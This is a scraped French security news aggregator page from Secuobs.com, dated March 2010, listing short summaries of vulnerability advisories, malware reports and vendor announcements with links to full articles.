http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com Secuobs.com : 2010-03-11 13:55:19 - CNIS mag - Fait-divers avec cette étude de M rsouinorg souvent citée mais rarement référencée par nos confrères , qui nous révèle sans surprise la quasi absence de réaction des internautes téléchargeurs face aux conséquences de la loi Hadopi A peine 15pourcents des internautes qui utilisaient les réseaux Peer-to-Peer avant l adoption de la loi Hadopi ont http://www.secuobs.com/revue/news/200658.shtmlhttp://www.secuobs.com/revue/news/200658.shtml Secuobs.com : 2010-03-11 13:50:57 - Vigilance vulnérabilités publiques - Un attaquant authentifié peut créer une requête contenant de nombreux JOINs, afin de stopper PostgreSQL http://www.secuobs.com/revue/news/200657.shtmlhttp://www.secuobs.com/revue/news/200657.shtml Secuobs.com : 2010-03-11 13:50:57 - Vigilance vulnérabilités publiques - Lorsque OpenSSL supporte l'échange de clé Kerberos, et si l'application serveur est dans une prison chroot, un attaquant peut envoyer un message ClientHello spécial, afin de stopper l'application http://www.secuobs.com/revue/news/200656.shtmlhttp://www.secuobs.com/revue/news/200656.shtml Secuobs.com : 2010-03-11 13:33:37 - L'Atelier.fr Toute l'actualité - Cette technologie de radio fréquence a fait la une de la presse spécialisée depuis les années 2000 Longtemps présentée comme le summum de la traçabilité, où en est-on aujourd'hui IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200653.shtmlhttp://www.secuobs.com/revue/news/200653.shtml Secuobs.com : 2010-03-11 12:47:19 - Global Security Mag Online - AVG Technologies ouvre un bureau en France à travers le rachat de Square, distributeur exclusif de la version française d'AVG Antivirus L'acquisition de Square par AVG s'inscrit dans la logique de l'ouverture du bureau en France puisque depuis toujours Square commercialise nos solutions En nous implantant en France, nous souhaitons affirmer notre attachement au marché français et ainsi être plus proche de nos clients , explique JR Smith, directeur général d'AVG Technologies Le siège - Business http://www.secuobs.com/revue/news/200644.shtmlhttp://www.secuobs.com/revue/news/200644.shtml Secuobs.com : 2010-03-11 12:47:19 - Global Security Mag Online - Une vague d'attaque, semblable à l'exploit Aurora pourrait utiliser une nouvelle faille dans le navigateur Internet de Microsoft Microsoft a émis un avis de sécurité http wwwmicrosoftcom technet se au sujet d'une faille de sécurité dans Internet Explorer 6 et 7 La version 8, n'est quant à elle pas affectée Une faille qui permet les mêmes scénarios d'attaque que ceux utilisés lors des exploits Aurora pratiqués à la fin de l'année 2009 Elle permet dans certaines circonstances d'exécuter des - Info Malwares http://www.secuobs.com/revue/news/200643.shtmlhttp://www.secuobs.com/revue/news/200643.shtml Secuobs.com : 2010-03-11 12:25:05 - Ma petite parcelle d'Internet... - C 'est via le Diary du SANS que j'apprenais la présence d'un malware dans le package logiciel qui accompagne un chargeur de piles USB Energizer Par malware, on entendra une fort jolie backdoor qui permet d'accéder système à distance Pas top Plus récemment c'est cette histoire de smartphone infecté qui est arrivée sur la table Un utilisateur, se trouvant également être un employé de l'éditeur d'antivirus PandaSecurity, se s'étonnait d'avoir à faire face à un HTC Magic bien décidé à lui délivrer quelques méchanteries bien senties, dont le désormais célèbre Mariposa Incident isolé qu'on nous dit http://www.secuobs.com/revue/news/200641.shtmlhttp://www.secuobs.com/revue/news/200641.shtml Secuobs.com : 2010-03-11 12:22:31 - L'Atelier.fr Toute l'actualité - Les enseignes ont pris l'habitude de discuter avec les consommateurs via des pages de fan sur Facebook TweetShare se propose de parer le fil Twitter de fonctions équivalentes IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200640.shtmlhttp://www.secuobs.com/revue/news/200640.shtml Secuobs.com : 2010-03-11 09:40:24 - Global Security Mag Online - Cette TPE créée dans une pépinière située à la Courneuve, dans la cité des 4000, a remporté un appel d'offres public de 1,4 millions d'euros Avec ce contrat cadre qui accroît significativement son CA, MBDSYS voit plus loin et change d'objectifs gérer sa croissance et déménager à la Tour Pleyel à Saint-Denis Créée en 2004, MBDSYS est une entreprise génération open source spécialisée dans les communications sur Internet et les solutions embarquées TPE experte en recherche et développement - Marchés http://www.secuobs.com/revue/news/200611.shtmlhttp://www.secuobs.com/revue/news/200611.shtml Secuobs.com : 2010-03-11 01:35:20 - CNIS mag - De manière cyclique, l actualité sécurité sombre dans le fait divers Parfois dans le but de marginaliser l importance d un événement, parfois parce que le traitement débridé de l information par les blogueurs et buzzeurs parvient à transformer une taupinière en Everest digne le la manchette du défunt Détective, parfois encore parce que l information ne relève effectivement que http://www.secuobs.com/revue/news/200476.shtmlhttp://www.secuobs.com/revue/news/200476.shtml Secuobs.com : 2010-03-11 01:35:20 - CNIS mag - L assassinat de Mahmoud al-Mabhouh dans un hôtel de Dubaï continue à soulever beaucoup de questions Et notamment celle portant sur l ouverture de la porte de la victime serrure crochetée Carte d hôtel falsifiée comme le laisse entendre la police locale Il existe une multitude de méthodes pour tutoyer gentiment une porte d hôtel, nous http://www.secuobs.com/revue/news/200475.shtmlhttp://www.secuobs.com/revue/news/200475.shtml Secuobs.com : 2010-03-11 01:35:20 - CNIS mag - L indice de risque des seules MS-010-016 et MS-010-017 est teinté de carmin Le patch Tuesday de ce mois de mars est d autant plus intéressant qu il se focalise sur un produit mineur une faille de Movie Maker et un défaut touchant un produit bureautique, Excel, tant sous Windows que sur Macintosh En revanche, il http://www.secuobs.com/revue/news/200474.shtmlhttp://www.secuobs.com/revue/news/200474.shtml Secuobs.com : 2010-03-10 20:15:32 - Journal du Net Solutions l'actualité en bref - Microsoft publie une nouvelle alerte de sécurité portant sur une faille non-corrigée dans Internet Explorer Les versions 6 e http://www.secuobs.com/revue/news/200347.shtmlhttp://www.secuobs.com/revue/news/200347.shtml Secuobs.com : 2010-03-10 19:40:22 - L'Atelier.fr Toute l'actualité - L'université de Caroline du nord propose un système d'identification biométrique basé sur la voix qui accélère le résultat d'authentification Le but généraliser leur utilisation, notamment sur les téléphones IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200342.shtmlhttp://www.secuobs.com/revue/news/200342.shtml Secuobs.com : 2010-03-10 18:59:26 - Global Security Mag Online - Zscaler annonce avoir rejoint le carré magique de Gartner Magic Quadrant en tant que société la plus visionnaire, parmi les acteurs dédiés à la sécurité sur Internet et notamment à la protection contre les applications web malveillantes Un tel positionnement de leader au sein de sa catégorie n'avait encore jamais été atteint par un acteur aussi jeune sur le marché 2007 Ce statut démontre à quel point Gartner est convaincu que l'évolution du marché de la sécurité internet passe par le modèle SaaS - Magic Quadrant http://www.secuobs.com/revue/news/200326.shtmlhttp://www.secuobs.com/revue/news/200326.shtml Secuobs.com : 2010-03-10 18:59:26 - Global Security Mag Online - Azlan Tech Data en partenariat avec hp ProCurve lance le programme ProCurve Plus Ce programme, dédié aux revendeurs SMB, permet aux partenaires de se former sur les gammes LAN et WLAN hp ProCurve, d'acheter des produits à des conditions NFR, de bénéficier de conditions tarifaires préférentielles et bien d'autres avantages Pour adhérer à ce programme, il suffit aux revendeurs de s'inscrire à une des 3 premières sessions proposées les 18 et 25 mars et le 1er avril 2010 Les revendeurs peuvent - ÉVÉNEMENTS http://www.secuobs.com/revue/news/200325.shtmlhttp://www.secuobs.com/revue/news/200325.shtml Secuobs.com : 2010-03-10 18:54:27 - Les derniers documents du CERTA. - Une vulnérabilité dans Dovecot permet à un utilisateur distant malintentionné de provoquer un déni de service à distance http://www.secuobs.com/revue/news/200319.shtmlhttp://www.secuobs.com/revue/news/200319.shtml Secuobs.com : 2010-03-10 18:54:27 - Les derniers documents du CERTA. - Une vulnérabilité dans HP Performance Insight permet l'exécution de code à distance http://www.secuobs.com/revue/news/200318.shtmlhttp://www.secuobs.com/revue/news/200318.shtml Secuobs.com : 2010-03-10 18:54:27 - Les derniers documents du CERTA. - Une vulnérabilité dans Samba permet le contournement de la politique de sécurité http://www.secuobs.com/revue/news/200317.shtmlhttp://www.secuobs.com/revue/news/200317.shtml Secuobs.com : 2010-03-10 18:46:44 - Vigilance vulnérabilités publiques - Un attaquant peut employer des messages SCCP, SIP ou CIT, afin de mener des dénis de service sur Cisco Unified Communications Manager http://www.secuobs.com/revue/news/200315.shtmlhttp://www.secuobs.com/revue/news/200315.shtml Secuobs.com : 2010-03-10 17:57:22 - Bruno Kerouanton - http://www.secuobs.com/revue/news/200281.shtmlhttp://www.secuobs.com/revue/news/200281.shtml Secuobs.com : 2010-03-10 17:44:32 - Journal du Net Solutions l'actualité en bref - Dévoilée sur le blog officiel des chercheurs de l'éditeur de sécurité Panda Software, l'existence d'un malware présent par http://www.secuobs.com/revue/news/200274.shtmlhttp://www.secuobs.com/revue/news/200274.shtml Secuobs.com : 2010-03-10 17:36:39 - Global Security Mag Online - KB98015 Bulletin de sécurité Microsoft MS10-015 Date 10 Mars 2010 Plateforme Windows Programme Microsoft Excel Gravité Elevée Exploitation Avec un fichier malicieux Dommage Accès au système Description Microsoft vient de corriger sept vulnérabilités affectant Microsoft Excel de la suite Office Celles-ci permettaient à un attaquant distant de compromettre un système Ces failles de sécurité proviennent de la façon dont Excel traite les fichiers XLS La première - Vulnérabilités http://www.secuobs.com/revue/news/200272.shtmlhttp://www.secuobs.com/revue/news/200272.shtml Secuobs.com : 2010-03-10 17:36:39 - Global Security Mag Online - KB975561 Bulletin de sécurité Microsoft MS10-016 Date 10 Mars 2010 Plateforme Windows Programme Windows Movie Maker Gravité Elevée Exploitation Avec un fichier malicieux Dommage Accès au système Description Microsoft vient d'annoncer la publication d'un correctif supprimant une vulnérabilité de Windows Movie Maker Celle-ci permettait à un attaquant distant de compromettre un système La faille de sécurité est liée au traitement des fichiers de projet Movie Maker ou - Vulnérabilités http://www.secuobs.com/revue/news/200271.shtmlhttp://www.secuobs.com/revue/news/200271.shtml Secuobs.com : 2010-03-10 17:29:31 - Vigilance vulnérabilités publiques - Lorsque Apache httpd utilise une SubRequest et un MPM multi-threadé, les données d'une session peuvent être retournées à un autre utilisateur http://www.secuobs.com/revue/news/200268.shtmlhttp://www.secuobs.com/revue/news/200268.shtml Secuobs.com : 2010-03-10 17:15:34 - L'Atelier.fr Toute l'actualité - L'université de Toronto a analysé l'impact des programmes informatiques de support médical sur le travail des médecins Selon elle, le rôle de ces logiciels est à relativiser IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200264.shtmlhttp://www.secuobs.com/revue/news/200264.shtml Secuobs.com : 2010-03-10 16:32:29 - Global Security Mag Online - SonicWALL, Inc a présenté à l'occasion de la Conférence RSA 2010, l'appliance de sécurité réseau SonicWALL NSA E-Class E8500, un nouveau pare-feu IPS système de prévention des intrusions doté des fonctionnalités d'Application Intelligence and Control à l'attention des grands comptes La NSA E8500 étend la protection des appliances de sécurité réseau SonicWALL pour y inclure la gestion et le contrôle des données et applications qui traversent le réseau La NSA E8500 optimise cette protection grâce à des - Produits http://www.secuobs.com/revue/news/200236.shtmlhttp://www.secuobs.com/revue/news/200236.shtml Secuobs.com : 2010-03-10 16:32:29 - Global Security Mag Online - AVG Technologies publie les résultats de son étude selon lesquels, contrairement à l'idée généralement répandue, la plupart des sites malveillants sont hébergés non pas dans des pays comme la Chine, mais bien aux États-Unis L'étude s'appuie sur une analyse des menaces signalées au cours des six derniers mois par les 110 millions d'utilisateurs de LinkScanner, produit de protection contre les menaces en ligne proposé par AVG Elle met en évidence une recrudescence des sites malveillants qui prennent pour - Info Malwares http://www.secuobs.com/revue/news/200235.shtmlhttp://www.secuobs.com/revue/news/200235.shtml Secuobs.com : 2010-03-10 16:32:29 - Global Security Mag Online - SonicWALL, Inc a annoncé la sortie de sa gamme d'appliances de sécurité virtuelles à l'occasion de la Conférence RSA 2010, indiquant que les deux premières versions SonicWALL GMS et ViewPoint étaient d'ores et déjà disponibles L'appliance virtuelle anti-spam pour les grands comptes, Email Security, devrait paraître ultérieurement ce trimestre D'autres appliances de sécurité virtuelles seront lancées au cours des prochains trimestres A l'heure où les entreprises consolident de plus en plus leurs - Produits http://www.secuobs.com/revue/news/200234.shtmlhttp://www.secuobs.com/revue/news/200234.shtml Secuobs.com : 2010-03-10 16:32:29 - Global Security Mag Online - Le lancement médiatique et commercial d'un nouveau CD vierge GOLD par notre société a été l'occasion d'entendre une question récurrente pour le moins étonnante quelle est la nouveauté technologique de ce produit Sur nos marchés, on est tellement habitué à chercher le plus techno qu'on en oublie qu'une technologie qui a fait ses preuves n'a pas forcément besoin d'évoluer mais de se maintenir On pourrait s'amuser de voir un nouveau CD vierge arrivé sur le marché face aux clés USB, cartes flash et disques - Points de Vue http://www.secuobs.com/revue/news/200233.shtmlhttp://www.secuobs.com/revue/news/200233.shtml Secuobs.com : 2010-03-10 16:32:29 - Global Security Mag Online - Intego, le spécialiste de la sécurité pour Mac, a annoncé la commercialisation de VirusBarrier X6 Dual Protection Cette offre comprend la toute dernière version de son logiciel plébiscité de protection contre les malware et menaces réseau, ainsi que BitDefender Antivirus 2010 qui permet aux utilisateurs Mac de protéger leurs installations Windows VirusBarrier X6, la dernière version du programme d'Intego destiné à la protection réseau et à la lutte contre les malware, inclut de nouvelles techniques - Produits http://www.secuobs.com/revue/news/200232.shtmlhttp://www.secuobs.com/revue/news/200232.shtml Secuobs.com : 2010-03-10 16:08:18 - L'Atelier.fr Toute l'actualité - Il est plus facile de se concentrer sur les concepts enseignés avec un poste avec lequel on est familier qu'en utilisant des PC publics Cela facilite aussi la poursuite du travail hors du cours IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200225.shtmlhttp://www.secuobs.com/revue/news/200225.shtml Secuobs.com : 2010-03-10 15:18:46 - Global Security Mag Online - Absolute Software Corporation, spécialiste des solutions de récupération d'ordinateurs volés, de protection des données et de gestion sécurisée des ordinateurs, et Ponemon Institute, un cabinet de recherche spécialisé dans la gestion de l'information, publient aujourd'hui les résultats de la deuxième étude annuelle Human Factor in Laptop Encryption Cette étude porte sur l'impact du facteur humain sur la sécurisation des données en entreprise Selon les conclusions de l'étude, les managers d'entreprise - Investigations http://www.secuobs.com/revue/news/200213.shtmlhttp://www.secuobs.com/revue/news/200213.shtml Secuobs.com : 2010-03-10 15:14:06 - Les derniers documents du CERTA. - Une vulnérabilité dans phpBB permet de contourner les restrictions de lecture de certains messages http://www.secuobs.com/revue/news/200212.shtmlhttp://www.secuobs.com/revue/news/200212.shtml Secuobs.com : 2010-03-10 15:14:06 - Les derniers documents du CERTA. - Une vulnérabilité dans Microsoft Internet Explorer permet l'exécution de code arbitraire à distance http://www.secuobs.com/revue/news/200211.shtmlhttp://www.secuobs.com/revue/news/200211.shtml Secuobs.com : 2010-03-10 15:14:06 - Les derniers documents du CERTA. - Une vulnérabilité dans Windows Movie Maker et dans Microsoft Producer 2003 permet d'exécuter du code arbitraire à distance http://www.secuobs.com/revue/news/200210.shtmlhttp://www.secuobs.com/revue/news/200210.shtml Secuobs.com : 2010-03-10 15:14:06 - Les derniers documents du CERTA. - De multiples vulnérabilités dans Microsoft Excel permettent l'exécution de code à distance http://www.secuobs.com/revue/news/200209.shtmlhttp://www.secuobs.com/revue/news/200209.shtml Secuobs.com : 2010-03-10 15:11:43 - Vigilance vulnérabilités publiques - Un attaquant peut tronquer un fichier NFS, afin de stopper le noyau, et éventuellement de faire exécuter du code http://www.secuobs.com/revue/news/200208.shtmlhttp://www.secuobs.com/revue/news/200208.shtml Secuobs.com : 2010-03-10 13:46:38 - L'Atelier.fr Toute l'actualité - Pour convaincre les plus de cinquante ans d'adopter l'ADSL, mieux vaut se concentrer sur la possibilité de rester en contact avec ses proches ou d'effectuer des recherches que sur des critères purement technologiques IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200191.shtmlhttp://www.secuobs.com/revue/news/200191.shtml Secuobs.com : 2010-03-10 12:55:05 - Global Security Mag Online - Selon le rapport mensuel ESET des menaces identifiées en France et en Europe, INF Autorun a représenté 7,85pourcents des menaces au mois de février À la seconde place, Win32 PSW OnlineGames continue de perturber les joueurs en ligne en atteignant le taux de 6,22pourcents En modifiant le contenu d'un média amovible, le virus INF Autorun demeure la plus fréquente menace constatée en France Ce ver exploite la fonction de démarrage automatique qui s'applique généralement au chargement d'un CD contenant un programme - Info Malwares http://www.secuobs.com/revue/news/200181.shtmlhttp://www.secuobs.com/revue/news/200181.shtml Secuobs.com : 2010-03-10 12:50:16 - CNET France Spécial - Classée comme très dangereuse, la faille d'Opera n est pas encore corrigée par un patch Opera Software affirme que celui-ci arrivera très rapidement Lire l'article http://www.secuobs.com/revue/news/200180.shtmlhttp://www.secuobs.com/revue/news/200180.shtml Secuobs.com : 2010-03-10 12:29:21 - L'Atelier.fr Toute l'actualité - Les coupons sont plébiscités par les marketeurs, qui y voient le moyen d'établir une relation directe avec le consommateur Ils misent aussi sur le portable pour faciliter le test de produits IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200178.shtmlhttp://www.secuobs.com/revue/news/200178.shtml Secuobs.com : 2010-03-10 11:43:43 - Global Security Mag Online - Quest Software, Inc, lance une nouvelle version de Quest ActiveRoles Quick Connect Cette solution permet de provisionner et de déprovisionner les identités automatiquement, ainsi que de synchroniser les mots de passe et autorisations en environnements hétérogènes Elle prend désormais en charge les environnements Microsoft SharePoint et SAP Provisioning et déprovisioning en temps réel d'un compte utilisateur ou d'un groupe d'utilisateurs, définition des droits d'accès par utilisateurs ou par - Produits http://www.secuobs.com/revue/news/200168.shtmlhttp://www.secuobs.com/revue/news/200168.shtml Secuobs.com : 2010-03-10 11:43:43 - Global Security Mag Online - Exclusive Storage annonce un accord de distribution en France des solutions de protection de données Quantum Ce partenariat permet à Exclusive Storage d'enrichir son catalogue avec des solutions de sauvegarde, de restauration et d'archivage Les revendeurs d'Exclusive Storage pourront rencontrer Quantum lors de face-à-face speed dating organisés dans toute la France le 11 mars sur Lyon, le 16 mars sur Paris, le 23 mars sur Marseille et le 25 mars sur - Business http://www.secuobs.com/revue/news/200167.shtmlhttp://www.secuobs.com/revue/news/200167.shtml Secuobs.com : 2010-03-10 10:37:27 - Vigilance vulnérabilités publiques - Un attaquant peut provoquer un déni de service dans les modules mod_proxy_ajp et mod_isapi de Apache httpd http://www.secuobs.com/revue/news/200160.shtmlhttp://www.secuobs.com/revue/news/200160.shtml Secuobs.com : 2010-03-10 10:37:27 - Vigilance vulnérabilités publiques - Un attaquant peut créer une image extrêmement compressée, et inviter la victime à l'ouvrir avec libpng, afin de provoquer un déni de service sur sa machine http://www.secuobs.com/revue/news/200159.shtmlhttp://www.secuobs.com/revue/news/200159.shtml Secuobs.com : 2010-03-10 09:39:43 - Vigilance vulnérabilités publiques - Un attaquant peut utiliser plusieurs vulnérabilités de PHP afin de contourner les restrictions d'accès aux fichiers http://www.secuobs.com/revue/news/200149.shtmlhttp://www.secuobs.com/revue/news/200149.shtml Secuobs.com : 2010-03-10 00:06:34 - Global Security Mag Online - LSTI est le premier organisme de certification de compétence en Europe à être approuvé membre à part entière d'IPC pour ses certifications ISO 27001 Lead Auditor et ISO 27001 Lead Implementer LSTI, premier à offrir des certifications de compétences sur les normes ISO 27001 Système de Management de la Sécurité de l'Information et ISO 27005 Management des risques en sécurité de l'information en France, est fier d'annoncer son entrée comme membre à part entière full member d'IPC, l'association - Business http://www.secuobs.com/revue/news/199987.shtmlhttp://www.secuobs.com/revue/news/199987.shtml Secuobs.com : 2010-03-09 23:03:00 - Global Security Mag Online - Energizer DUO USB battery charger software allows unauthorized remote system access Date 09 Mars 2010 Description L'US-CERT vient d'émettre un bulletin concernant un logiciel de l'entreprise Energizer D'après des chercheurs de l'US-CERT, le logiciel lié au chargeur de piles par USB de la marque Energizer Energizer DUO, modèle CHUSB contient un malware Le fichier contaminé était téléchargé automatiquement lors de l'installation du logiciel fourni avec le chargeur de pile USB Ce logiciel, - Vulnérabilités http://www.secuobs.com/revue/news/199942.shtmlhttp://www.secuobs.com/revue/news/199942.shtml Secuobs.com : 2010-03-09 20:58:16 - Global Security Mag Online - Genetec annonce le lancement du Security Center 40, la toute dernière version de sa plateforme de sécurité unifiée Le Security Center intègre désormais, de façon transparente, les systèmes de vidéosurveillance Omnicast, de contrôle d'accès Synergis et de reconnaissance des plaques minéralogiques RPM AutoVu de Genetec pour ainsi offrir aux clients un espace central dans lequel ils pourront gérer toutes leurs opérations de sécurité L'intégration d'AutoVu dans le Security Center est l'une des plus - Produits http://www.secuobs.com/revue/news/199886.shtmlhttp://www.secuobs.com/revue/news/199886.shtml Secuobs.com : 2010-03-09 19:19:07 - Global Security Mag Online - Ruckus Wireless annonce que Gartner Inc l'a positionné en tant que visionnaire dans le dernier rapport Magic Quadrant, pour les solutions réseaux sans fil WLAN Gartner a positionné Ruckus Wireless dans la catégorie visionnaires pour sa capacité à développer les caractéristiques de ses offres et à fournir une approche unique et différente sur le marché des infrastructures WLAN Les entreprises définies comme visionnaires par Gartner dans le Magic Quadrant ont su démontrer de véritables - Magic Quadrant http://www.secuobs.com/revue/news/199851.shtmlhttp://www.secuobs.com/revue/news/199851.shtml Secuobs.com : 2010-03-09 18:53:58 - L'Atelier.fr Toute l'actualité - En fonction de son niveau d'interaction avec la plate-forme d'apprentissage, il est possible de déterminer à quel profil appartient un élève Et donc d'adapter la méthode d'enseignement en fonction IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199835.shtmlhttp://www.secuobs.com/revue/news/199835.shtml Secuobs.com : 2010-03-09 18:09:36 - Global Security Mag Online - Pour répondre aux besoins croissants de puissance de calcul des applications informatiques émergentes, les GPUs Graphics Processing Unit constituent une alternative très prometteuse à l'utilisation des CPUs Central Processing Unit classiques Actuellement, leur utilisation reste confidentielle car freinée par la difficulté à exploiter ces architectures complexes sans standard réel Le projet OpenGPU vise à construire le 1er pôle européen de recherche et de développement dans le domaine des - Business http://www.secuobs.com/revue/news/199812.shtmlhttp://www.secuobs.com/revue/news/199812.shtml Secuobs.com : 2010-03-09 18:09:36 - Global Security Mag Online - Radware développe sa gamme de produits Alteon Application Switch avec deux nouveaux OnDemand switches , les modèles Alteon 4408 et Alteon 4416 La série Alteon 4 est disponible moins d'un an après l'acquisition par Radware de l'activité de Nortel dans le domaine de la commutation d'applications niveau 4-7 Elle vient compléter la gamme de produits existants récemment enrichie avec le modèle Alteon 5412, qui assure un débit d'application delivery jusqu'à 20 Gbps La série Alteon 4 de Radware assure - Produits http://www.secuobs.com/revue/news/199811.shtmlhttp://www.secuobs.com/revue/news/199811.shtml Secuobs.com : 2010-03-09 18:09:36 - Global Security Mag Online - Le Groupe LEXSI dévoile un plan de recrutement ambitieux pour 2010 recruter une cinquantaine de nouveaux collaborateurs afin de soutenir sa croissance et répondre à la demande du marché LEXSI souhaite s'entourer de consultants expérimentés, porteurs de savoirs faire différenciateurs et de jeunes talents Les profils recherchés sont les suivants Auditeur sénior sécurité systèmes d'information Auditeur sécurité applicative IDF Chargé d'affaire Le CERT recherche parallèlement une quinzaine de - Business http://www.secuobs.com/revue/news/199810.shtmlhttp://www.secuobs.com/revue/news/199810.shtml Secuobs.com : 2010-03-09 18:09:36 - Global Security Mag Online - Azlan, division à valeur ajoutée du groupe Tech Data, présente son écosystème lié à la vidéo surveillance vidéo protection Alors que le gouvernement annonce un triplement de son parc de caméras sur la voie publique d'ici 2012, les prévisions de déploiement sont très fortes Tous les marchés sont concernés par la protection vidéo comme La santé hôpitaux, maisons de retraite Le commerce surveillance des locaux, lutte contre le vol Le grand public surveillance distante de résidences - Produits http://www.secuobs.com/revue/news/199809.shtmlhttp://www.secuobs.com/revue/news/199809.shtml Secuobs.com : 2010-03-09 17:44:31 - L'Atelier.fr Toute l'actualité - L'université de Rawalpindi propose un système d'indexation qui facilite la recherche de services web avant de balayer les annuaires spécialisés, il puise dans les requêtes qui ont abouti et qui sont stockées en cache IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199802.shtmlhttp://www.secuobs.com/revue/news/199802.shtml Secuobs.com : 2010-03-09 16:54:47 - Vigilance vulnérabilités publiques - Un attaquant peut inviter la victime à consulter une url illicite, afin de faire exécuter du code JavaScript dans le contexte du serveur Lotus Domino http://www.secuobs.com/revue/news/199771.shtmlhttp://www.secuobs.com/revue/news/199771.shtml Secuobs.com : 2010-03-09 16:41:11 - L'Atelier.fr Toute l'actualité - Pour qu'un site de collaboration dure sur le long terme, il est important qu'un renouvellement des personnes inscrites s'opère régulièrement Cela afin de favoriser l'émergence d'idées nouvelles IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199766.shtmlhttp://www.secuobs.com/revue/news/199766.shtml Secuobs.com : 2010-03-09 14:39:54 - Vigilance vulnérabilités publiques - Un attaquant peut injecter des requêtes SQL dans l'extension Calendar Base de TYPO3 http://www.secuobs.com/revue/news/199725.shtmlhttp://www.secuobs.com/revue/news/199725.shtml Secuobs.com : 2010-03-09 13:49:54 - Global Security Mag Online - Dans le cadre du dispositif RAPID , EdenWall Technologies obtient une subvention de la DGA Direction Générale de l'Armement et de la DGCIS Direction Générale de la Compétitivité de l'Insdustrie et des Services Cette subvention a pour objectif d'accompagner l'entreprise et son partenaire Dalibo, spécialiste des bases de données PostgreSQL, dans la recherche et le développement d'une solution capable de supporter jusqu'à un million d'utilisateurs Grâce à la technologie NuFW intégrée à ses boîtiers, - Business http://www.secuobs.com/revue/news/199715.shtmlhttp://www.secuobs.com/revue/news/199715.shtml Secuobs.com : 2010-03-09 13:49:54 - Global Security Mag Online - NetApp dévoile de nouvelles solutions cloud destinées aux fournisseurs de services NetApp Service-Oriented Infrastructure SOI l'infrastructure SOI offre aux fournisseurs de services une architecture standardisée et unifiée, leur permettant d'exploiter et de déployer les ressources de stockage, réseau et informatiques à la demande Data Protection as a Service DPaaS NetApp propose un guide de conception qui leur permet de déployer des offres DPaaS, dédiées notamment à l'archivage et la - Produits http://www.secuobs.com/revue/news/199714.shtmlhttp://www.secuobs.com/revue/news/199714.shtml Secuobs.com : 2010-03-09 13:49:54 - Global Security Mag Online - Netgear complète sa gamme de systèmes de stockage ReadyNAS avec deux nouveaux modèles optimisés pour les environnements virtualisés le ReadyNAS 3100, de format 1U à 4 baies, et le ReadyNAS 4200, de format 2U à 12 baies Le ReadyNAS 3100 est un boîtier rackable' de format 1U à 4 baies qui offre jusqu'à 8 To de capacité de stockage Le ReadyNAS 4200 est un boîtier rackable' de format 2U à 12 baies qui offre jusqu'à 24 To de capacité de stockage et deux disques redondants Tous deux sont certifiés VMware - Produits http://www.secuobs.com/revue/news/199713.shtmlhttp://www.secuobs.com/revue/news/199713.shtml Secuobs.com : 2010-03-09 13:27:58 - L'Atelier.fr Toute l'actualité - L'application permet à un site Internet d'être référencé dans les résultats de Google lorsqu'il diffuse un contenu syndiqué type flux RSS Un moyen pour les professionnels de gagner en visibilité IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199710.shtmlhttp://www.secuobs.com/revue/news/199710.shtml Secuobs.com : 2010-03-09 12:23:23 - Geo's blog - Ce petit poste plus ou moins inutile pour me rappeler de quelques fonctionnalités intéressantes que j'ai trouvé au pif sur notepad Vous savez, quand on fait une séquence de touches sans faire exprès Ca peut mener à des résultats rigolos On connait bien, pour la plupart, le raccourci Ctrl G G de Go IMAGE Invite de notepad Aller à un endroit précis Le développeur de cet outil est très amusant Y'a aussi Ctrl Q - Q étant la première lettre de Quote En fonction du langage que vous avez choisi pour la coloration syntaxique, sélectionnez votre bloc de code et appuyez sur ctrl Q pour y passer en commentaires IMAGE Invite de notepad Commenter du code cliquez pour agrandir Et enfin, à l'instant, je viens de taper sur ctrl espace, et là WOOT IMAGE Invite de notepad quelle fonction utiliser cliquez pour agrandir On a une liste - peut-être exhaustive - de fonctions php à utiliser Et c'est pas qu'en PHP qu'on nous propose ça Je connaissais pas, c'est marrant Bon, ok, cet article sert un peu à rien, c'est juste pour archiver une connerie dont j'aimerais me resservir et ne pas oublier Cya Geo http://www.secuobs.com/revue/news/199708.shtmlhttp://www.secuobs.com/revue/news/199708.shtml Secuobs.com : 2010-03-09 11:52:21 - Global Security Mag Online - RSA, la division sécurité d'EMC, a révélé une vision stratégique et un ensemble de solutions et services RSA permettant aux entreprises d'adresser les besoins de sécurité et conformité des informations et des identités dans les environnements VMware Beaucoup de défis de sécurité en infrastructure virtuelle sont semblables à ceux des environnements informatiques physiques Un avantage de la virtualisation réside dans la visibilité et le contrôle améliorés grâce à la gestion centralisée, avantage offrant - Produits http://www.secuobs.com/revue/news/199695.shtmlhttp://www.secuobs.com/revue/news/199695.shtml Secuobs.com : 2010-03-09 11:46:55 - CNET France Spécial - Classés comme importants, les correctifs de ce patch Tuesday du mois de mars 2010 concernent toutes les versions grand public de Windows et les versions PC et Mac de la suite Office Lire l'article http://www.secuobs.com/revue/news/199694.shtmlhttp://www.secuobs.com/revue/news/199694.shtml Secuobs.com : 2010-03-09 11:43:23 - Vigilance vulnérabilités publiques - Un attaquant local peut employer deux vulnérabilités de ncpfs, afin d'obtenir des informations ou de mener un déni de service http://www.secuobs.com/revue/news/199693.shtmlhttp://www.secuobs.com/revue/news/199693.shtml Secuobs.com : 2010-03-09 11:23:52 - L'Atelier.fr Toute l'actualité - Le Comdex renaît sur Internet Une initiative qui devrait faire tâche d'huile les salons virtuels sont moins coûteux en temps et en argent Et offrent une reconstitution d'expérience satisfaisante IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199692.shtmlhttp://www.secuobs.com/revue/news/199692.shtml Secuobs.com : 2010-03-09 10:43:33 - Global Security Mag Online - SafeNet, Inc annonce la mise à disposition de solutions permettant aux entreprises d'assurer la sécurité des données sensibles lors de déploiement en mode Cloud Computing SafeNet propose des solutions data-centric permettant de protéger les données en environnement Cloud Tokens d'authentification intelligents Le fait que seuls les utilisateurs autorisés puissent avoir accès aux ressources placées dans une infrastructure en mode Cloud est une composante critique pour les prestataires du - Produits 